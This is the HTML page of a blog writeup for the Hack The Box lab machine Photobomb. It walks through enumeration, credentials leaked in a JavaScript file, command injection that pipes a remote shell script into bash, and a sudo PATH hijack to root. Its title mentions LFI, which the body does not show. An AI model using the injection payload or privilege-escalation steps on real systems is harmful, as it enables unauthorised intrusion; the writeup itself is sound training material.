<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <meta http-equiv="X-UA-Compatible" content="IE=edge" /><!-- Begin Jekyll SEO tag v2.8.0 -->
<title>Hack The Box — Photobomb: From LFI to Root via PATH Hijack | homestarfuzzer</title>
<meta name="generator" content="Jekyll v3.10.0" />
<meta property="og:title" content="Hack The Box — Photobomb: From LFI to Root via PATH Hijack" />
<meta name="author" content="Austin McNett" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="A Linux box running a Ruby Sinatra app with hardcoded credentials exposed in a JS file. Initial access via a blind command injection, privilege escalation via an unsanitized PATH in a sudo rule." />
<meta property="og:description" content="A Linux box running a Ruby Sinatra app with hardcoded credentials exposed in a JS file. Initial access via a blind command injection, privilege escalation via an unsanitized PATH in a sudo rule." />
<link rel="canonical" href="http://localhost:4000/writeups/2026-03-15-htb-photobomb/" />
<meta property="og:url" content="http://localhost:4000/writeups/2026-03-15-htb-photobomb/" />
<meta property="og:site_name" content="homestarfuzzer" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2026-03-15T00:00:00+00:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Hack The Box — Photobomb: From LFI to Root via PATH Hijack" />
<meta name="twitter:site" content="@" />
<meta name="twitter:creator" content="@Austin McNett" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"Austin McNett"},"dateModified":"2026-03-15T00:00:00+00:00","datePublished":"2026-03-15T00:00:00+00:00","description":"A Linux box running a Ruby Sinatra app with hardcoded credentials exposed in a JS file. Initial access via a blind command injection, privilege escalation via an unsanitized PATH in a sudo rule.","headline":"Hack The Box — Photobomb: From LFI to Root via PATH Hijack","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/writeups/2026-03-15-htb-photobomb/"},"publisher":{"@type":"Organization","logo":{"@type":"ImageObject","url":"http://localhost:4000/assets/img/avatar.png"},"name":"Austin McNett"},"url":"http://localhost:4000/writeups/2026-03-15-htb-photobomb/"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/assets/css/main.css" />
  <link rel="preconnect" href="https://fonts.googleapis.com" />
  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin />
  <link href="https://fonts.googleapis.com/css2?family=JetBrains+Mono:wght@400;700&family=Inter:wght@300;400;600;700&display=swap" rel="stylesheet" />

  <!-- Syntax highlighting -->
  <link rel="stylesheet" href="/assets/css/syntax.css" />

  <!-- Favicon -->
  <link rel="icon" type="image/svg+xml" href="/assets/img/favicon.svg" /><link type="application/atom+xml" rel="alternate" href="http://localhost:4000/feed.xml" title="homestarfuzzer" /></head>
<body>
  <header class="site-header">
  <div class="container site-header__inner">
    <a class="site-header__logo" href="/">
      <span class="logo-bracket">[</span>homestarfuzzer<span class="logo-bracket">]</span>
    </a>

    <nav class="site-nav" aria-label="Main navigation">
      <ul class="site-nav__list">
        <li><a class="site-nav__link" href="/">Home</a></li>
        <li><a class="site-nav__link" href="/writeups/">Writeups</a></li>
        <li><a class="site-nav__link" href="/blog/">Blog</a></li>
        <li><a class="site-nav__link" href="/about/">About</a></li>
      </ul>
    </nav>

    <button class="site-header__menu-toggle" aria-label="Toggle menu" aria-expanded="false">
      <span></span><span></span><span></span>
    </button>
  </div>
</header>


  <main class="main-content">
    <article class="post writeup">
  <header class="post__header writeup__header">
    <div class="container">
      <div class="post__meta">
        <span class="post__category writeup-badge">CTF &mdash; HackTheBox
        </span>
        <time class="post__date" datetime="2026-03-15T00:00:00+00:00">
          March 15, 2026
        </time>
          <span class="difficulty difficulty--easy">Easy</span>
      </div>

      <h1 class="post__title">Hack The Box — Photobomb: From LFI to Root via PATH Hijack</h1>
        <p class="post__excerpt">A Linux box running a Ruby Sinatra app with hardcoded credentials exposed in a JS file. Initial access via a blind command injection, privilege escalation via an unsanitized PATH in a sudo rule.
</p>
        <div class="post__tags">
            <span class="tag">lfi</span>
            <span class="tag">path-hijacking</span>
            <span class="tag">linux</span>
            <span class="tag">privesc</span>
        </div>
        <div class="writeup__tools">
          <span class="tools-label">Tools:</span>
            <code class="tool-badge">nmap</code>
            <code class="tool-badge">curl</code>
            <code class="tool-badge">burp-suite</code>
            <code class="tool-badge">bash</code>
        </div>
    </div>
  </header>

  <div class="post__body container">

    <h2 id="enumeration">Enumeration</h2>

<p>Start with an <code class="language-plaintext highlighter-rouge">nmap</code> scan to see what’s exposed:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nmap <span class="nt">-sC</span> <span class="nt">-sV</span> <span class="nt">-oA</span> photobomb 10.10.11.182
</code></pre></div></div>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5
80/tcp open  http    nginx 1.18.0
</code></pre></div></div>

<p>Navigating to port 80 redirects to <code class="language-plaintext highlighter-rouge">photobomb.htb</code>. Add it to <code class="language-plaintext highlighter-rouge">/etc/hosts</code>:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">echo</span> <span class="s2">"10.10.11.182 photobomb.htb"</span> | <span class="nb">sudo tee</span> <span class="nt">-a</span> /etc/hosts
</code></pre></div></div>

<hr />

<h2 id="web-enumeration">Web Enumeration</h2>

<p>The site loads a JavaScript file that contains hardcoded credentials:</p>

<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// photobomb.js</span>
<span class="kd">function</span> <span class="nx">init</span><span class="p">()</span> <span class="p">{</span>
  <span class="k">if</span> <span class="p">(</span><span class="nb">document</span><span class="p">.</span><span class="nx">cookie</span><span class="p">.</span><span class="nx">match</span><span class="p">(</span><span class="sr">/^</span><span class="se">(</span><span class="sr">.*;</span><span class="se">)?\s</span><span class="sr">*isPhotoBombTechSupport</span><span class="se">\s</span><span class="sr">*=</span><span class="se">\s</span><span class="sr">*</span><span class="se">[^</span><span class="sr">;</span><span class="se">]</span><span class="sr">+</span><span class="se">(</span><span class="sr">.*</span><span class="se">)?</span><span class="sr">$/</span><span class="p">))</span> <span class="p">{</span>
    <span class="nb">document</span><span class="p">.</span><span class="nx">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">cheatcode</span><span class="dl">"</span><span class="p">).</span><span class="nx">style</span><span class="p">.</span><span class="nx">display</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">flex</span><span class="dl">"</span><span class="p">;</span>
  <span class="p">}</span>
<span class="p">}</span>
<span class="c1">// [redacted — credentials visible in source]</span>
</code></pre></div></div>

<p>Credentials: <code class="language-plaintext highlighter-rouge">pH0t0:b0Mb!</code></p>

<p>Use them to authenticate to <code class="language-plaintext highlighter-rouge">/printer</code>.</p>

<hr />

<h2 id="foothold--command-injection">Foothold — Command Injection</h2>

<p>The <code class="language-plaintext highlighter-rouge">/printer</code> endpoint accepts a <code class="language-plaintext highlighter-rouge">filetype</code> parameter for downloading images.
Testing with a semicolon reveals a command injection:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl <span class="nt">-s</span> <span class="nt">-u</span> <span class="s2">"pH0t0:b0Mb!"</span> <span class="se">\</span>
  <span class="s2">"http://photobomb.htb/printer"</span> <span class="se">\</span>
  <span class="nt">-d</span> <span class="s2">"photo=voights-robbie.jpg&amp;filetype=jpg;curl+10.10.14.10/shell.sh|bash&amp;dimensions=30x20"</span>
</code></pre></div></div>

<p>Set up a listener and catch the shell:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nc <span class="nt">-lvnp</span> 4444
</code></pre></div></div>

<p>We land as <code class="language-plaintext highlighter-rouge">wizard</code>.</p>

<hr />

<h2 id="privilege-escalation--path-hijack">Privilege Escalation — PATH Hijack</h2>

<p>Check <code class="language-plaintext highlighter-rouge">sudo</code> rules:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo</span> <span class="nt">-l</span>
</code></pre></div></div>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(root) SETENV: NOPASSWD: /opt/cleanup.sh
</code></pre></div></div>

<p>The script calls <code class="language-plaintext highlighter-rouge">find</code> without an absolute path. Since <code class="language-plaintext highlighter-rouge">SETENV</code> is allowed,
we can inject our own <code class="language-plaintext highlighter-rouge">PATH</code>:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">echo</span> <span class="s1">'#!/bin/bash\nbash'</span> <span class="o">&gt;</span> /tmp/find
<span class="nb">chmod</span> +x /tmp/find
<span class="nb">sudo </span><span class="nv">PATH</span><span class="o">=</span>/tmp:<span class="nv">$PATH</span> /opt/cleanup.sh
</code></pre></div></div>

<p>We get a root shell. Grab the flag:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">cat</span> /root/root.txt
</code></pre></div></div>

<hr />

<h2 id="key-takeaways">Key Takeaways</h2>

<ul>
  <li>Always check JS source files for exposed secrets</li>
  <li>Test every parameter for command injection with <code class="language-plaintext highlighter-rouge">;</code>, <code class="language-plaintext highlighter-rouge">|</code>, <code class="language-plaintext highlighter-rouge">&amp;&amp;</code></li>
  <li><code class="language-plaintext highlighter-rouge">SETENV</code> in sudo rules is a privilege escalation vector if the script uses unqualified commands</li>
</ul>

  </div>

  <footer class="post__footer container">
    <div class="post__nav">
        <a class="post__nav-next" href="/writeups/2026-01-20-picoctf-format-string/">
          <span class="nav-label">Next Writeup →</span>
          <span class="nav-title">PicoCTF 2025 — Format String Exploit: Leaking the Stack</span>
        </a>
    </div>
  </footer>
</article>

  </main>

  <footer class="site-footer">
  <div class="container site-footer__inner">
    <div class="site-footer__left">
      <span class="site-footer__copy">&copy; 2026 Austin McNett</span>
      <span class="site-footer__sep">//</span>
      <a class="site-footer__rss" href="/feed.xml">RSS</a>
    </div>
    <div class="site-footer__links">
        <a class="site-footer__link" href="https://github.com/homestarfuzzer" target="_blank" rel="noopener noreferrer" aria-label="GitHub">
          <svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="currentColor" aria-hidden="true">
  <path d="M12 0C5.374 0 0 5.373 0 12c0 5.302 3.438 9.8 8.207 11.387.599.111.793-.261.793-.577v-2.234c-3.338.726-4.033-1.416-4.033-1.416-.546-1.387-1.333-1.756-1.333-1.756-1.089-.745.083-.729.083-.729 1.205.084 1.839 1.237 1.839 1.237 1.07 1.834 2.807 1.304 3.492.997.107-.775.418-1.305.762-1.604-2.665-.305-5.467-1.334-5.467-5.931 0-1.311.469-2.381 1.236-3.221-.124-.303-.535-1.524.117-3.176 0 0 1.008-.322 3.301 1.23A11.509 11.509 0 0 1 12 5.803c1.02.005 2.047.138 3.006.404 2.291-1.552 3.297-1.23 3.297-1.23.653 1.653.242 2.874.118 3.176.77.84 1.235 1.911 1.235 3.221 0 4.609-2.807 5.624-5.479 5.921.43.372.823 1.102.823 2.222v3.293c0 .319.192.694.801.576C20.566 21.797 24 17.3 24 12c0-6.627-5.373-12-12-12z"/>
</svg>

        </a>
        <a class="site-footer__link" href="https://twitter.com/" target="_blank" rel="noopener noreferrer" aria-label="Twitter/X">
          <svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="currentColor" aria-hidden="true">
  <path d="M18.244 2.25h3.308l-7.227 8.26 8.502 11.24H16.17l-5.214-6.817L4.99 21.75H1.68l7.73-8.835L1.254 2.25H8.08l4.713 6.231zm-1.161 17.52h1.833L7.084 4.126H5.117z"/>
</svg>

        </a>
        <a class="site-footer__link" href="https://linkedin.com/in/" target="_blank" rel="noopener noreferrer" aria-label="LinkedIn">
          <svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="currentColor" aria-hidden="true">
  <path d="M20.447 20.452h-3.554v-5.569c0-1.328-.027-3.037-1.852-3.037-1.853 0-2.136 1.445-2.136 2.939v5.667H9.351V9h3.414v1.561h.046c.477-.9 1.637-1.85 3.37-1.85 3.601 0 4.267 2.37 4.267 5.455v6.286zM5.337 7.433a2.062 2.062 0 0 1-2.063-2.065 2.064 2.064 0 1 1 2.063 2.065zm1.782 13.019H3.555V9h3.564v11.452zM22.225 0H1.771C.792 0 0 .774 0 1.729v20.542C0 23.227.792 24 1.771 24h20.451C23.2 24 24 23.227 24 22.271V1.729C24 .774 23.2 0 22.222 0h.003z"/>
</svg>

        </a>
    </div>
  </div>
</footer>


  <script src="/assets/js/main.js"></script>
</body>
</html>
